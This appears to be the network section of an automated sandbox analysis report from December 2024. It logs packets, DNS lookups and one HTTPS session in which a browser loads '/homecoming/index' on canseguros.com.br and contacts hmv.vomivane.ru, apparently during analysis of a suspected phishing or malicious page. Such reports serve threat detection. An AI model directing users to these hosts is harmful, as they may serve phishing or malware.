Dec 19, 2024 20:20:40.892992020 CET	443	49733	172.67.134.25	192.168.2.6
Dec 19, 2024 20:20:40.912326097 CET	443	49753	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:40.912473917 CET	443	49753	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:40.912525892 CET	49753	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:40.912575006 CET	49753	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:40.912601948 CET	443	49753	35.190.80.1	192.168.2.6
Dec 19, 2024 20:20:40.912640095 CET	49753	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:40.912659883 CET	49753	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:20:50.010396957 CET	49781	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:50.010497093 CET	443	49781	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:50.010629892 CET	49781	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:50.011251926 CET	49781	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:50.011288881 CET	443	49781	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:52.232650042 CET	443	49781	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:52.232767105 CET	49781	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:52.240484953 CET	49781	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:52.240524054 CET	443	49781	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:52.240768909 CET	443	49781	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:52.243115902 CET	49781	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:52.243200064 CET	49781	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:52.243211031 CET	443	49781	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:52.243391991 CET	49781	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:52.291342974 CET	443	49781	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:52.785835028 CET	443	49781	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:52.786043882 CET	443	49781	20.198.118.190	192.168.2.6
Dec 19, 2024 20:20:52.786118031 CET	49781	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:52.786261082 CET	49781	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:20:52.786283970 CET	443	49781	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:05.117733002 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:05.117779016 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:05.117882013 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:05.118489027 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:05.118503094 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:06.282541990 CET	80	49703	217.20.58.101	192.168.2.6
Dec 19, 2024 20:21:06.282701015 CET	49703	80	192.168.2.6	217.20.58.101
Dec 19, 2024 20:21:06.285429955 CET	49703	80	192.168.2.6	217.20.58.101
Dec 19, 2024 20:21:06.449969053 CET	80	49703	217.20.58.101	192.168.2.6
Dec 19, 2024 20:21:07.343666077 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:07.343801975 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:07.345933914 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:07.345944881 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:07.346719980 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:07.348762035 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:07.348824978 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:07.348831892 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:07.348959923 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:07.395338058 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:07.896776915 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:07.896861076 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:07.897428989 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:07.897464037 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:07.897476912 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:07.897485018 CET	443	49815	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:07.897521019 CET	49815	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:27.845717907 CET	49868	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:21:27.845758915 CET	443	49868	142.250.181.132	192.168.2.6
Dec 19, 2024 20:21:27.845837116 CET	49868	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:21:27.846134901 CET	49868	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:21:27.846151114 CET	443	49868	142.250.181.132	192.168.2.6
Dec 19, 2024 20:21:28.120068073 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:28.120114088 CET	443	49869	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:28.120219946 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:28.121032953 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:28.121045113 CET	443	49869	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:29.538307905 CET	443	49868	142.250.181.132	192.168.2.6
Dec 19, 2024 20:21:29.538678885 CET	49868	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:21:29.538713932 CET	443	49868	142.250.181.132	192.168.2.6
Dec 19, 2024 20:21:29.539067984 CET	443	49868	142.250.181.132	192.168.2.6
Dec 19, 2024 20:21:29.539427996 CET	49868	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:21:29.539491892 CET	443	49868	142.250.181.132	192.168.2.6
Dec 19, 2024 20:21:29.594140053 CET	49868	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:21:29.798028946 CET	443	49869	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:29.798168898 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:29.800169945 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:29.800178051 CET	443	49869	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:29.800410032 CET	443	49869	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:29.802442074 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:29.802515030 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:29.802520037 CET	443	49869	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:29.802660942 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:29.843357086 CET	443	49869	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:30.459630966 CET	443	49869	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:30.459919930 CET	443	49869	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:30.459994078 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:30.460232973 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:30.460258007 CET	443	49869	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:30.460299015 CET	49869	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:37.422576904 CET	49892	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:37.422641039 CET	443	49892	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:37.422719002 CET	49892	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:37.423070908 CET	49892	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:37.423086882 CET	443	49892	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:38.634377956 CET	443	49892	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:38.687140942 CET	49892	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:38.797220945 CET	49892	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:38.797243118 CET	443	49892	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:38.797979116 CET	443	49892	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:38.799354076 CET	49892	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:38.799447060 CET	443	49892	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:38.799518108 CET	49892	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:38.847333908 CET	443	49892	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:39.141999006 CET	443	49892	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:39.142096996 CET	443	49892	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:39.143157005 CET	49892	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:39.143157005 CET	49892	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:39.143161058 CET	49897	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:39.143210888 CET	443	49897	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:39.143292904 CET	49897	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:39.143517017 CET	49897	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:39.143532991 CET	443	49897	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:39.234705925 CET	443	49868	142.250.181.132	192.168.2.6
Dec 19, 2024 20:21:39.234785080 CET	443	49868	142.250.181.132	192.168.2.6
Dec 19, 2024 20:21:39.234839916 CET	49868	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:21:39.452842951 CET	49892	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:39.452867985 CET	443	49892	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:40.297128916 CET	49868	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:21:40.297188044 CET	443	49868	142.250.181.132	192.168.2.6
Dec 19, 2024 20:21:40.360935926 CET	443	49897	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:40.361248016 CET	49897	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:40.361277103 CET	443	49897	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:40.361634016 CET	443	49897	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:40.362111092 CET	49897	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:40.362170935 CET	443	49897	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:40.362279892 CET	49897	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:40.407332897 CET	443	49897	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:40.825350046 CET	443	49897	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:40.825762987 CET	49897	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:40.825818062 CET	443	49897	35.190.80.1	192.168.2.6
Dec 19, 2024 20:21:40.825882912 CET	49897	443	192.168.2.6	35.190.80.1
Dec 19, 2024 20:21:51.133697987 CET	49927	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:51.133755922 CET	443	49927	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:51.133898020 CET	49927	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:51.134499073 CET	49927	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:51.134514093 CET	443	49927	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:53.352832079 CET	443	49927	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:53.352947950 CET	49927	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:53.354749918 CET	49927	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:53.354759932 CET	443	49927	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:53.355020046 CET	443	49927	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:53.356609106 CET	49927	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:53.356671095 CET	49927	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:53.356674910 CET	443	49927	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:53.356798887 CET	49927	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:53.399374008 CET	443	49927	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:54.026237011 CET	443	49927	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:54.026330948 CET	443	49927	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:54.026405096 CET	49927	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:54.026698112 CET	49927	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:21:54.026716948 CET	443	49927	20.198.118.190	192.168.2.6
Dec 19, 2024 20:21:58.079227924 CET	49702	443	192.168.2.6	20.190.177.147
Dec 19, 2024 20:21:58.199732065 CET	443	49702	20.190.177.147	192.168.2.6
Dec 19, 2024 20:21:58.199814081 CET	49702	443	192.168.2.6	20.190.177.147
Dec 19, 2024 20:22:04.219327927 CET	49705	443	192.168.2.6	20.190.177.147
Dec 19, 2024 20:22:04.404128075 CET	443	49705	20.190.177.147	192.168.2.6
Dec 19, 2024 20:22:04.404242992 CET	49705	443	192.168.2.6	20.190.177.147
Dec 19, 2024 20:22:18.714051008 CET	49990	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:22:18.714076042 CET	443	49990	20.198.118.190	192.168.2.6
Dec 19, 2024 20:22:18.714171886 CET	49990	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:22:18.714797974 CET	49990	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:22:18.714816093 CET	443	49990	20.198.118.190	192.168.2.6
Dec 19, 2024 20:22:21.015045881 CET	443	49990	20.198.118.190	192.168.2.6
Dec 19, 2024 20:22:21.015209913 CET	49990	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:22:21.017071009 CET	49990	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:22:21.017079115 CET	443	49990	20.198.118.190	192.168.2.6
Dec 19, 2024 20:22:21.017342091 CET	443	49990	20.198.118.190	192.168.2.6
Dec 19, 2024 20:22:21.019193888 CET	49990	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:22:21.019193888 CET	49990	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:22:21.019215107 CET	443	49990	20.198.118.190	192.168.2.6
Dec 19, 2024 20:22:21.019336939 CET	49990	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:22:21.063344002 CET	443	49990	20.198.118.190	192.168.2.6
Dec 19, 2024 20:22:21.693155050 CET	443	49990	20.198.118.190	192.168.2.6
Dec 19, 2024 20:22:21.693255901 CET	443	49990	20.198.118.190	192.168.2.6
Dec 19, 2024 20:22:21.693373919 CET	49990	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:22:21.693573952 CET	49990	443	192.168.2.6	20.198.118.190
Dec 19, 2024 20:22:21.693584919 CET	443	49990	20.198.118.190	192.168.2.6
Dec 19, 2024 20:22:27.906723976 CET	50011	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:22:27.906769991 CET	443	50011	142.250.181.132	192.168.2.6
Dec 19, 2024 20:22:27.906897068 CET	50011	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:22:27.907186031 CET	50011	443	192.168.2.6	142.250.181.132
Dec 19, 2024 20:22:27.907198906 CET	443	50011	142.250.181.132	192.168.2.6
Dec 19, 2024 20:22:29.601552963 CET	443	50011	142.250.181.132	192.168.2.6
Dec 19, 2024 20:22:29.655540943 CET	50011	443	192.168.2.6	142.250.181.132

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 20:20:23.294008017 CET	52917	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:23.294133902 CET	64739	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:23.431294918 CET	53	53607	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:23.441093922 CET	53	59163	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:24.021416903 CET	53	52917	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:24.022465944 CET	53	64739	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:26.033647060 CET	52052	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:26.033798933 CET	64231	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:26.286382914 CET	53	58222	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:26.531999111 CET	53	64231	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:26.534986973 CET	53	52052	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:27.779036999 CET	63356	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:27.779174089 CET	52577	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:27.916445017 CET	53	63356	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:27.916482925 CET	53	52577	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:29.716320038 CET	57149	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:29.716579914 CET	60083	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:29.853786945 CET	53	57149	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:29.854305983 CET	53	60083	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:31.062037945 CET	59420	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:31.063071966 CET	63305	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:31.481713057 CET	53	59420	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:31.482008934 CET	53	63305	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:31.588546991 CET	53727	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:31.588804960 CET	63049	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:31.726012945 CET	53	53727	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:31.732825041 CET	53	63049	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:37.410957098 CET	63251	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:37.411114931 CET	64602	53	192.168.2.6	1.1.1.1
Dec 19, 2024 20:20:37.552505016 CET	53	63251	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:37.552663088 CET	53	64602	1.1.1.1	192.168.2.6
Dec 19, 2024 20:20:43.209414959 CET	53	49991	1.1.1.1	192.168.2.6
Dec 19, 2024 20:21:01.966865063 CET	53	60811	1.1.1.1	192.168.2.6
Dec 19, 2024 20:21:23.235961914 CET	53	60381	1.1.1.1	192.168.2.6
Dec 19, 2024 20:21:24.830692053 CET	53	52639	1.1.1.1	192.168.2.6
Dec 19, 2024 20:21:54.937396049 CET	53	59759	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 20:20:23.294008017 CET	192.168.2.6	1.1.1.1	0x92ea	Standard query (0)	canseguros.com.br	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:23.294133902 CET	192.168.2.6	1.1.1.1	0x69c7	Standard query (0)	canseguros.com.br	65	IN (0x0001)	false
Dec 19, 2024 20:20:26.033647060 CET	192.168.2.6	1.1.1.1	0xd2af	Standard query (0)	logo.clearbit.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:26.033798933 CET	192.168.2.6	1.1.1.1	0x903a	Standard query (0)	logo.clearbit.com	65	IN (0x0001)	false
Dec 19, 2024 20:20:27.779036999 CET	192.168.2.6	1.1.1.1	0xa38a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:27.779174089 CET	192.168.2.6	1.1.1.1	0xf743	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 19, 2024 20:20:29.716320038 CET	192.168.2.6	1.1.1.1	0x3107	Standard query (0)	logo.clearbit.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:29.716579914 CET	192.168.2.6	1.1.1.1	0x13a3	Standard query (0)	logo.clearbit.com	65	IN (0x0001)	false
Dec 19, 2024 20:20:31.062037945 CET	192.168.2.6	1.1.1.1	0xacd	Standard query (0)	hmv.vomivane.ru	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:31.063071966 CET	192.168.2.6	1.1.1.1	0xb1a7	Standard query (0)	hmv.vomivane.ru	65	IN (0x0001)	false
Dec 19, 2024 20:20:31.588546991 CET	192.168.2.6	1.1.1.1	0xd907	Standard query (0)	canseguros.com.br	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:31.588804960 CET	192.168.2.6	1.1.1.1	0xcd3b	Standard query (0)	canseguros.com.br	65	IN (0x0001)	false
Dec 19, 2024 20:20:37.410957098 CET	192.168.2.6	1.1.1.1	0x10f4	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:37.411114931 CET	192.168.2.6	1.1.1.1	0x6b67	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 20:20:24.021416903 CET	1.1.1.1	192.168.2.6	0x92ea	No error (0)	canseguros.com.br		162.241.2.141	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:26.531999111 CET	1.1.1.1	192.168.2.6	0x903a	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 20:20:26.534986973 CET	1.1.1.1	192.168.2.6	0xd2af	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 20:20:26.534986973 CET	1.1.1.1	192.168.2.6	0xd2af	No error (0)	d26p066pn2w0s0.cloudfront.net		13.227.8.47	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:26.534986973 CET	1.1.1.1	192.168.2.6	0xd2af	No error (0)	d26p066pn2w0s0.cloudfront.net		13.227.8.65	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:26.534986973 CET	1.1.1.1	192.168.2.6	0xd2af	No error (0)	d26p066pn2w0s0.cloudfront.net		13.227.8.64	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:26.534986973 CET	1.1.1.1	192.168.2.6	0xd2af	No error (0)	d26p066pn2w0s0.cloudfront.net		13.227.8.72	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:27.916445017 CET	1.1.1.1	192.168.2.6	0xa38a	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:27.916482925 CET	1.1.1.1	192.168.2.6	0xf743	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 19, 2024 20:20:29.853786945 CET	1.1.1.1	192.168.2.6	0x3107	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 20:20:29.853786945 CET	1.1.1.1	192.168.2.6	0x3107	No error (0)	d26p066pn2w0s0.cloudfront.net		13.227.8.64	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:29.853786945 CET	1.1.1.1	192.168.2.6	0x3107	No error (0)	d26p066pn2w0s0.cloudfront.net		13.227.8.72	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:29.853786945 CET	1.1.1.1	192.168.2.6	0x3107	No error (0)	d26p066pn2w0s0.cloudfront.net		13.227.8.47	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:29.853786945 CET	1.1.1.1	192.168.2.6	0x3107	No error (0)	d26p066pn2w0s0.cloudfront.net		13.227.8.65	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:29.854305983 CET	1.1.1.1	192.168.2.6	0x13a3	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 20:20:31.481713057 CET	1.1.1.1	192.168.2.6	0xacd	No error (0)	hmv.vomivane.ru		172.67.134.25	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:31.481713057 CET	1.1.1.1	192.168.2.6	0xacd	No error (0)	hmv.vomivane.ru		104.21.5.254	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:31.482008934 CET	1.1.1.1	192.168.2.6	0xb1a7	No error (0)	hmv.vomivane.ru			65	IN (0x0001)	false
Dec 19, 2024 20:20:31.726012945 CET	1.1.1.1	192.168.2.6	0xd907	No error (0)	canseguros.com.br		162.241.2.141	A (IP address)	IN (0x0001)	false
Dec 19, 2024 20:20:37.552505016 CET	1.1.1.1	192.168.2.6	0x10f4	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

canseguros.com.br

https:

logo.clearbit.com

hmv.vomivane.ru

a.nel.cloudflare.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	162.241.2.141	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:25 UTC	676	OUT	GET /homecoming/index HTTP/1.1 Host: canseguros.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:20:25 UTC	255	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 19:20:25 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 18 Dec 2024 11:25:36 GMT Accept-Ranges: bytes Content-Length: 2637 Vary: Accept-Encoding Content-Type: text/html
2024-12-19 19:20:25 UTC	2637	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 72 65 63 6f 67 6e 69 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>recognition</title> <style> * { margin: 0; padding: 0;

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49714	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:27 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2f 44 64 4c 39 54 4f 53 75 30 32 6c 4d 68 65 39 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 62 65 38 32 64 34 62 30 33 34 37 30 64 38 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: /DdL9TOSu02lMhe9.1Context: 57be82d4b03470d8
